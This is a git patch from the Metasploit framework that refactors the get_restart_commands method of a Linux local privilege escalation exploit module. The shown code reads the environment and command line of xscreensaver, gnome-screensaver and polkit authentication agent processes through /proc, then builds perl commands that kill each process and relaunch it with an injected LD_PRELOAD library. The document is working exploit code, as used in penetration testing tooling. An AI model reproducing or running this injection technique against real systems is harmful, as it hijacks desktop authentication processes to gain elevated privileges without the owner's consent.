From 36ac0e6279a644a1bc862aed68869f5fdc51c67b Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 24 Dec 2014 14:55:18 -0600
Subject: [PATCH] Clean get_restart_commands

---
 .../local/desktop_privilege_escalation.rb     | 25 +++++++++++++++----
 1 file changed, 20 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/linux/local/desktop_privilege_escalation.rb b/modules/exploits/linux/local/desktop_privilege_escalation.rb
index 5b0c32426e..ebff894fd9 100644
--- a/modules/exploits/linux/local/desktop_privilege_escalation.rb
+++ b/modules/exploits/linux/local/desktop_privilege_escalation.rb
@@ -109,29 +109,44 @@ class Metasploit4 < Msf::Exploit::Local
   end
 
   def get_restart_commands
-    text_output = cmd_exec('pidof xscreensaver gnome-screensaver polkit-gnome-authentication-agent-1|perl -ne \'while(/(\d+)/g){$pid=$1;next unless -r "/proc/$pid/environ";print"PID:$pid\nEXE:".readlink("/proc/$pid/exe")."\n";$/=undef;for("cmdline","environ"){open F,"</proc/$pid/$_";print "$_:".unpack("H*",<F>),"\n";}}\'').gsub("\r","")
+    get_cmd_lines = 'pidof xscreensaver gnome-screensaver polkit-gnome-authentication-agent-1|'
+    get_cmd_lines << 'perl -ne \'while(/(\d+)/g){$pid=$1;next unless -r "/proc/$pid/environ";'
+    get_cmd_lines << 'print"PID:$pid\nEXE:".readlink("/proc/$pid/exe")."\n";'
+    get_cmd_lines << '$/=undef;'
+    get_cmd_lines << 'for("cmdline","environ"){open F,"</proc/$pid/$_";print "$_:".unpack("H*",<F>),"\n";}}\''
+
+    text_output = cmd_exec(get_cmd_lines).gsub("\r",'')
     vprint_status(text_output)
+
     lines = text_output.split("\n")
-    process_restart_commands = []
+
+    restart_commands = []
     i=0
-    while(i < lines.length-3)
+    while i < lines.length - 3
       m = lines[i].match(/^PID:(\d+)/)
+
       if m
         pid = m[1]
         vprint_status("PID=#{pid}")
         print_status("Found process: " + lines[i+1])
+
         exe = lines[i+1].match(/^EXE:(\S+)$/)[1]
         vprint_status("exe=#{exe}")
+
         cmdline = [lines[i+2].match(/^cmdline:(\w+)$/)[1]].pack("H*").split("\x00")
         vprint_status("CMDLINE=" + cmdline.join(" XXX "))
+
         env = lines[i+3].match(/^environ:(\w+)$/)[1]
         restart_command = 'perl -e \'use POSIX setsid;open STDIN,"</dev/null";open STDOUT,">/dev/null";open STDERR,">/dev/null";exit if fork;setsid();kill(9,' + pid + ')||exit;%ENV=();for(split("\0",pack("H*","' + env + '"))){/([^=]+)=(.*)/;$ENV{$1}=$2}$ENV{"LD_PRELOAD"}="LD_PRELOAD_PLACEHOLDER";exec {"' + exe + '"} ' + cmdline.map{|x| '"' + x + '"'}.join(", ") + '\'';
+
         vprint_status("RESTART: #{restart_command}")
-        process_restart_commands.push(restart_command)
+        restart_commands.push(restart_command)
       end
+
       i+=1
     end
-    return process_restart_commands
+
+    restart_commands
   end
 
   def c_code(exe_file)